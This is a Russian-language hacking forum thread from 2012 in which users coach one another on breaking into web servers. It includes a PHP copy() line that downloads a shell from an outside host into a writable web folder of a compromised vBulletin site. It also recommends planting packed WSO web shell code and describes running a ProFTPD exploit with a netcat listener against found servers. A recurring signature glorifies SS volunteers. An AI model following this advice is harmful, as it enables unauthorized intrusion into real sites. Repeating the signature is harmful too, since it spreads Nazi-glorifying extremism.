 |
|
07.02.2012, 20:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от faza02
хорошо, спасибо.
а какие еще функции есть, которые не выключены, и через которые можно залить?
так ты что на данный момент имеешь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
07.02.2012, 20:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от None
disable_functions dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, chown, chgrp
allow_url_fopen On
вот, залить могу что угодно
|
|
|
|
07.02.2012, 20:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от faza02
вот, залить могу что угодно
я к тому что откуда ты эту инфу берешь, у тебя евал там?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
07.02.2012, 20:52
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
админка вб, выполнение пхп кода через модули
|
|
|
|
07.02.2012, 20:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
ну так заливай, в чем проблема, я тебя понять не могу...
если ты о том как заливать, то один из вариантов
copy('http://site.ru/shell.txt','/papka/s/npoBaMu/Ha/3anucb/6e3naleBashell.php');
если ты о том что за папка с правами на запись, то найди в пхпхинфо DOCUMENT_ROOT там будет путь к site.ru если у тебя форум в папке site.ru/forum/ то припишешь к этому пути /forum/ ну а там уже сам думай в какую папку лить, ищи которая на запись доступна
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
07.02.2012, 21:07
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Лучше сразу код пакованного WSO вставь. Дальше спокойно посмотришь, где доступно для записи, где нет и зальеш в уютное местечко =)
|
|
|
|
07.02.2012, 21:34
|
|
Новичок
Регистрация: 06.02.2012
Сообщений: 9
С нами:
7507766
Репутация:
0
|
|
Сообщение от james00x
Привет, нашел в сервер
220 ProFTPD 1.3.2e Server (ProFTPD)
Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/
У меня ест ТП-Линк - я там поставил виртуал сервер
ID Service Ports IP Address Protocol Status
1 45295 192.168.1.100 ALL Enabled
чтобы работала порт, тогда с netcat открыл тот порт через cmd.
C:\nc>nc -lvp 45295
listening on [any] 45295 ...
ладно тогда открываю новы cmd и запускаю перл ехплоит.
Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.
Если все сделал правильно тогда проста там все ок?
Я делаю все правильно? Потому что я нашел еще 2 сервера. Другие версии других операционных систем, но ничего не меняется. Но exploit показано, что ходить в их версии.
Заранее спасибо.
|
|
|
|
08.02.2012, 00:56
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
ребят, подскажите где можна почитать про уязвимость в поле search?
|
|
|
|
08.02.2012, 01:13
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от pirat0
ребят, подскажите где можна почитать про уязвимость в поле search?
поле 'search' ничем не отличается от 'уязвимости' id. Это просто мегап****ц вопрос. Никогда в этой теме так никому не говорил, но тут порвало шаблон. НАПИШИ КАКОЕ-НИТЬ подобие сайта из двух страниц и базы, чтобы не задавать таких вопросов.
|
|
|
|
08.02.2012, 01:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pirat0
ребят, подскажите где можна почитать про уязвимость в поле search?
разве это новая категория уязвимостей?
чаще всего там бывает xss или sqli, sqli из за недостаточной фильтрации входящих данных, которые используются вместе с оператором LIKE
Melfis +1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
